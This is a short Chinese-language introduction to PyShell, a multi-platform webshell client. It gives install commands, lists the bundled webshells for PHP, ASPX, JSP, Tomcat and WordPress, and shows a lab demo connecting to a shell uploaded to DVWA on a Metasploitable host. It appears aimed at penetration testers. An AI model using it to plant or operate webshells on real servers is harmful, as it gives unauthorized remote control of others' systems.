0x01介绍

PyShell是多平台 Python WebShell。此工具可帮助您在 Web 服务器上获得类似 shell 的界面以进行远程访问。与其他 webshell 不同,该工具的主要目标是在服务器端使用尽可能少的代码,而不管使用的语言或服务器的操作系统如何。多亏了这一点,您可以在 Windows 和 Linux 中使用不同类型的 shell(aspx、php、jsp、sh、py...),具有命令历史记录、上传和下载文件,甚至可以像在目录中一样移动标准外壳。

0x02安装

git clone https://github.com/JoelGMSec/PyShell
cd PyShell ;  pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple

0x03使用

Shells目录下有针对不同平台的web shell,将该shell上传到目标服务器上即可用pyshell连接。

──(kali㉿kali)-[~/PyShell]
└─$ cd Shells

┌──(kali㉿kali)-[~/PyShell/Shells]
└─$ ls
shell.aspx  shell.jsp  shell.php  shell.py  shell.sh  tomcat.war  wordpress.zip

连接webshell

┌──(kali㉿kali)-[~/PyShell]
└─$  python3 pyshell.py http://192.168.2.240/dvwa/hackable/uploads/shell.php POST

  ██████ ▓██   ░██  ██████  ██░ ██ ▓█████  ██▓     ██▓    
 ▓██░  ██▒██░   ██▒██    ▒ ▓██  ██▒▓██    ▓██▒    ▓██▒    
 ▓██░  ██▒ ██  ██░░ ▓███   ▒██████░▒████  ▒██░    ▒██░    
 ▒██████ ▒ ░████▓░  ▒   ██▒░██ ░██ ▒██    ▒██░    ▒██░    
 ▒██▒ ░  ░ ░ ██▒▓░▒██████▒▒░██▒░██▓░█████▒░██████▒░██████▒
 ▒██░ ░  ░  ██▒▒▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ░▒ ░     ▓██ ░▒░ ░ ░▒    ░ ▒ ░ ░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
 ░░   ░   ▒ ▒ ░░  ░  ░  ░   ░  ░░ ░         ░ ░     ░ ░   
 ░        ░             ░      ░      ░       ░          ░ 

  -------------- by @JoelGMSec & @3v4Si0N ---------------

 [PyShell]  www-data@metasploitable  /var/www/dvwa/hackable/uploads  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)